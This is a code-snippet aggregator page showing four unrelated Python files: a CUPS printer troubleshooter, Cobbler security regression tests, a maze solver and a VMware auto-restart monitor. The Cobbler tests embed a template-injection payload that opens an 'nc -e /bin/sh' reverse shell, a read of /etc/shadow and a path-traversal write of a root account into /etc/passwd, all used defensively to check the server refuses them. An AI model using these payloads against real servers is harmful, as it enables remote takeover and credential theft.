Best Python code snippet using slash
CheckNetworkServerSanity.py
Source:CheckNetworkServerSanity.py  
#!/usr/bin/python3

## Printing troubleshooter

## Copyright (C) 2008, 2009, 2010, 2011, 2014 Red Hat, Inc.
## Authors:
##  Tim Waugh <twaugh@redhat.com>

## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.

## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
## GNU General Public License for more details.

## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

from gi.repository import Gtk
import cups
import os
import smburi
import socket
import subprocess
from timedops import TimedSubprocess, TimedOperation
from .base import *
try:
    import smbc
except ImportError:
    # smbc is optional; its absence is detected later via NameError.
    pass

class CheckNetworkServerSanity(Question):
    """Troubleshooter question that probes the remote print server.

    display() never shows a page (it always returns False); it only
    gathers diagnostics into self.answers, which collect_answer() returns.
    """

    def __init__ (self, troubleshooter):
        Question.__init__ (self, troubleshooter, "Check network server sanity")
        troubleshooter.new_page (Gtk.Label (), self)

    @staticmethod
    def _resolve (host, port):
        """Return the list of addresses host resolves to, or False if
        name resolution fails."""
        try:
            ai = socket.getaddrinfo (host, port)
        except socket.gaierror:
            return False

        # Each entry is (family, type, proto, canonname, sockaddr);
        # the address string is the first element of sockaddr.
        return [entry[4][0] for entry in ai]

    def display (self):
        """Collect diagnostics about the remote server.

        Fills self.answers with whichever of these keys apply:
        remote_server_name_resolves, remote_server_try_connect,
        remote_server_connect_ipp, remote_server_cups,
        remote_cups_queue_attributes, remote_server_smb,
        remote_server_smb_shares, remote_server_smb_share_anon_access
        and remote_server_traceroute.

        Always returns False.
        """
        # Collect useful information.
        self.answers = {}
        answers = self.troubleshooter.answers
        if ('remote_server_name' not in answers and
            'remote_server_ip_address' not in answers):
            return False

        parent = self.troubleshooter.get_window ()

        # Only one of the two keys is guaranteed to be present, so the
        # name must be looked up without raising KeyError.
        server_name = answers.get ('remote_server_name')
        server_port = answers.get ('remote_server_port', 631)
        try_connect = False
        if server_name:
            # Try resolving the hostname.
            resolves = self._resolve (server_name, server_port)
            try_connect = resolves is not False
            self.answers['remote_server_name_resolves'] = resolves

            ipaddr = answers.get ('remote_server_ip_address', '')
            if resolves:
                if ipaddr and ipaddr not in resolves:
                    # The IP address given doesn't match the server name.
                    # Use the IP address instead of the name.
                    server_name = ipaddr
                    try_connect = True
            elif ipaddr:
                server_name = ipaddr
                try_connect = True
        else:
            if 'remote_server_ip_address' not in answers:
                # The name is empty and no address was recorded:
                # there is nothing to probe.
                return False

            server_name = answers['remote_server_ip_address']
            # Validate it.
            resolves = self._resolve (server_name, server_port)
            self.answers['remote_server_name_resolves'] = resolves
            try_connect = True

        self.answers['remote_server_try_connect'] = server_name

        scheme = answers.get ('cups_device_uri_scheme', 'ipp')
        if try_connect and scheme in ('ipp', 'http', 'https'):
            if scheme == 'https':
                encryption = cups.HTTP_ENCRYPT_REQUIRED
            else:
                encryption = cups.HTTP_ENCRYPT_IF_REQUESTED

            try:
                self.op = TimedOperation (cups.Connection,
                                          kwargs={"host": server_name,
                                                  "port": server_port,
                                                  "encryption": encryption},
                                          parent=parent)
                c = self.op.run ()
                ipp_connect = True
            except RuntimeError:
                ipp_connect = False

            self.answers['remote_server_connect_ipp'] = ipp_connect

            if ipp_connect:
                # Being able to list printers is taken as evidence that
                # the peer is a CUPS server.
                try:
                    self.op = TimedOperation (c.getPrinters, parent=parent)
                    self.op.run ()
                    cups_server = True
                except Exception:
                    cups_server = False

                self.answers['remote_server_cups'] = cups_server

                if cups_server:
                    cups_printer_dict = answers.get ('cups_printer_dict', {})
                    uri = cups_printer_dict.get ('device-uri', None)
                    if uri:
                        try:
                            self.op = TimedOperation (c.getPrinterAttributes,
                                                      kwargs={"uri": uri},
                                                      parent=parent)
                            attr = self.op.run ()
                            self.answers['remote_cups_queue_attributes'] = attr
                        except Exception:
                            # Best effort: the attributes are optional.
                            pass

        if try_connect:
            # Try to see if we can connect using smbc.
            context = None
            try:
                context = smbc.Context ()
                name = self.answers['remote_server_try_connect']
                self.op = TimedOperation (context.opendir,
                                          args=("smb://%s/" % name,),
                                          parent=parent)
                smb_dir = self.op.run ()
                self.op = TimedOperation (smb_dir.getdents, parent=parent)
                shares = self.op.run ()
                self.answers['remote_server_smb'] = True
                self.answers['remote_server_smb_shares'] = shares
            except NameError:
                # No smbc support
                pass
            except RuntimeError as e:
                # Record the error details in place of the share list.
                self.answers['remote_server_smb_shares'] = e.args

            if context is not None and 'cups_printer_dict' in answers:
                uri = answers['cups_printer_dict'].get ('device-uri', '')
                u = smburi.SMBURI (uri)
                (group, host, share, user, password) = u.separate ()
                accessible = False
                try:
                    self.op = TimedOperation (context.open,
                                              args=("smb://%s/%s" % (host,
                                                                     share),
                                                    os.O_RDWR,
                                                    0o777),
                                              parent=parent)
                    self.op.run ()
                    accessible = True
                except RuntimeError as e:
                    # Record the error details instead of True/False.
                    accessible = e.args

                self.answers['remote_server_smb_share_anon_access'] = accessible

        # Try traceroute if we haven't already.
        if (try_connect and
            'remote_server_traceroute' not in answers):
            try:
                self.op = TimedSubprocess (parent=parent, close_fds=True,
                                           args=['traceroute', '-w', '1',
                                                 server_name],
                                           stdin=subprocess.DEVNULL,
                                           stdout=subprocess.PIPE,
                                           stderr=subprocess.PIPE)
                self.answers['remote_server_traceroute'] = self.op.run ()
            except Exception:
                # Problem executing command.
                pass

        return False

    def collect_answer (self):
        """Return the diagnostics gathered by display()."""
        return self.answers

    def cancel_operation (self):
        # The listing is truncated here; the method body is not shown.
        ...
security_test.py
Source:security_test.py  
...
from cobbler.modules.authentication import pam

# ==================== Start tnpconsultants ====================
# SPDX-FileCopyrightText: 2021 Nicolas Chatelain <nicolas.chatelain@tnpconsultants.com>


@pytest.fixture
def try_connect():
    """Provide a factory that builds an XML-RPC proxy for a given URL."""

    def try_connect(url) -> xmlrpc.client.ServerProxy:
        xmlrpc_server = xmlrpc.client.ServerProxy(url)
        return xmlrpc_server

    return try_connect


@pytest.fixture(autouse=True)
def setup_profile(try_connect, create_kernel_initrd, fk_kernel, fk_initrd):
    """Create a test distro and profile before each test; remove them after."""
    cobbler_api = try_connect("http://localhost/cobbler_api")
    shared_secret = get_shared_secret()
    token = cobbler_api.login("", shared_secret)
    folder = create_kernel_initrd(fk_kernel, fk_initrd)
    kernel_path = os.path.join(folder, fk_kernel)
    # The initrd path must be built from the initrd file name, not the
    # kernel file name.
    initrd_path = os.path.join(folder, fk_initrd)

    # Create a test Distro
    distro = cobbler_api.new_distro(token)
    cobbler_api.modify_distro(distro, "name", "security_test_distro", token)
    cobbler_api.modify_distro(distro, "arch", "x86_64", token)
    cobbler_api.modify_distro(distro, "kernel", str(kernel_path), token)
    cobbler_api.modify_distro(distro, "initrd", str(initrd_path), token)
    cobbler_api.save_distro(distro, token)

    # Create a test Profile
    profile = cobbler_api.new_profile(token)
    cobbler_api.modify_profile(profile, "name", "security_test_profile", token)
    cobbler_api.modify_profile(profile, "distro", "security_test_distro", token)
    cobbler_api.save_profile(profile, token)

    yield

    # Teardown: remove the profile first, then the distro it refers to.
    cobbler_api.remove_profile("security_test_profile", token)
    cobbler_api.remove_distro("security_test_distro", token)


def test_arbitrary_file_disclosure_1(setup_profile, try_connect):
    """generate_script() must not return the contents of /etc/shadow."""
    # Arrange
    cobbler_api = try_connect("http://localhost/cobbler_api")

    # Act
    profiles = cobbler_api.get_profiles()
    target = profiles[0]["name"]
    try:
        result = cobbler_api.generate_script(target, "", "/etc/shadow")

        # Assert this does NOT succeed
        assert not result.startswith("root")
    except xmlrpc.client.Fault as e:
        # We have no way of exactly knowing what is in there but if its a ValueError we most likely caught the exploit
        # before something happened.
        assert "ValueError" in e.faultString


def test_template_injection_1(setup_profile, try_connect):
    """generate_script() must not echo back an injected template payload."""
    # Arrange
    exploitcode = "__import__('os').system('nc [tnpitsecurity] 4242 -e /bin/sh')"
    cobbler_api = try_connect("http://localhost/cobbler_api")

    # Act
    profiles = cobbler_api.get_profiles()
    target = profiles[0]["name"]
    try:
        print("[+] Stage 1 : Poisoning log with Cheetah template RCE")
        result_stage_1 = cobbler_api.generate_script(
            target, "", "{<%= " + exploitcode + " %>}"
        )
        print("[+] Stage 2 : Rendering template using an arbitrary file read.")
        result_stage_2 = cobbler_api.generate_script(
            target, "", "/var/log/cobbler/cobbler.log"
        )

        # Assert this does NOT succeed
        assert not result_stage_1.startswith("__import__")
        # We should never get to stage two
    except xmlrpc.client.Fault as e:
        # We have no way of exactly knowing what is in there but if its a ValueError we most likely caught the exploit
        # before something happened.
        assert "ValueError" in e.faultString


def test_arbitrary_file_write_1(setup_profile, try_connect):
    """upload_log_data() must refuse a path that escapes via '..'."""
    # Arrange
    cobbler_api = try_connect("http://localhost/cobbler_api")
    exploit = b"cha:!:0:0:cha:/:/bin/bash\n"

    # Act
    result = cobbler_api.upload_log_data(
        "../../../../../../etc",
        "passwd",
        len(exploit),
        100000,
        base64.b64encode(exploit),
    )

    # Assert this does NOT succeed
    assert result is False


# ==================== END tnpconsultants ====================
# ==================== START ysf ====================
# SPDX-FileCopyrightText: 2022 ysf <nicolas.chatelain@tnpconsultants.com>
...
solver.py
Source:solver.py  
...16    row = []17    for x in range(width):18        row.append(make_cell(lines[y][x], (x, y)))19    graph.append(row)20def try_connect(here, x, y):21    if (0 <= x < width) and (0 <= y < height): # in bounds22        there = graph[y][x]23        if there['contents'] != '#':24            # print("from {} to {} {}".format(here['pos'], x, y))25            here['neighbors'].append(there)26# hook up neighbors27for y in range(height):28    for x in range(width):29        here = graph[y][x]30        try_connect(here, x, y-1)31        try_connect(here, x, y+1)32        try_connect(here, x-1, y)33        try_connect(here, x+1, y)34# find start and end nodes35start, end = {}, {}36for y in range(height):37    for x in range(width):38        here = graph[y][x]39        if here['contents'] == 's':40            start = here41            print("start {} {}".format(x, y))42        if here['contents'] == 'e':43            print("end {} {}".format(x, y))44            end = here45# # print graph46# for row in graph:47#     for col in row:...engine.py
Source:engine.py  
1""" engines/engine """2import os3import subprocess4from vmwareweb.engines.authentications import SSHClient, ssh_cli5from vmwareweb.engines.response_collections import host_cmd_vmid, host_vrt, collection, initialization, vrt_unreachable6from vmwareweb import app7from vmwareweb.engines.send_email import alert, successful_autostart, bad_autostart8import paramiko9import time10import yaml11import logging12yaml_dir = os.path.abspath(os.path.dirname(__file__))13stream = open(os.path.join(yaml_dir, 'mp.yaml'))14mp = yaml.load(stream, Loader=yaml.FullLoader)15port = mp['port']16user = mp['user']17password = mp['password']18esx_list = [('vim-cmd vmsvc/power.on', 'ESX67')]19protocol_list = [('True SSL', 'SSL'), ('True TLS', 'TLS')]20def monitoring():21    """22        This function is listen IPs and will be check availability servers if server down then23        will be initialization response to auto start copy VM on other host and will be call SSH Client function24    """25    logging.info("!!! Engine start !!! {}".format(time.strftime("%d.%m.%y %H:%M")))26    try_connect = 027    initialization()28    while True:29        try:30            for vrt, host in host_vrt.items():31                answer = subprocess.call(['ping', '-c', '3', vrt])32                if answer != 0:33                    collection()34                    time.sleep(15)35                    try_connect += 136                    logging.info("!!! 
Try firs reconnection {} !!!".format(time.strftime("%d.%m.%y %H:%M")))37                    if try_connect == 2:38                        vrt_unreachable.append(vrt)39                        with app.app_context():40                            alert()41                    if try_connect >= 3:42                        for vm, cmd in host_cmd_vmid.items():43                            if vm == vrt:44                                ssh_cli(SSHClient(host, port, user, password), cmd)45                                try_connect = 046                                successful_autostart()47                    else:48                        continue49        except TimeoutError:50            print('Connection timed out')51            logging.info("SSH Connection time out {}".format(time.strftime("%d.%m.%y %H:%M")))52        except paramiko.ssh_exception.NoValidConnectionsError:53            print('NoValidConnectionsError')...Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.
You can also refer to the video tutorials on the LambdaTest YouTube channel for step-by-step demonstrations from industry experts.
Get 100 minutes of automation testing FREE!!
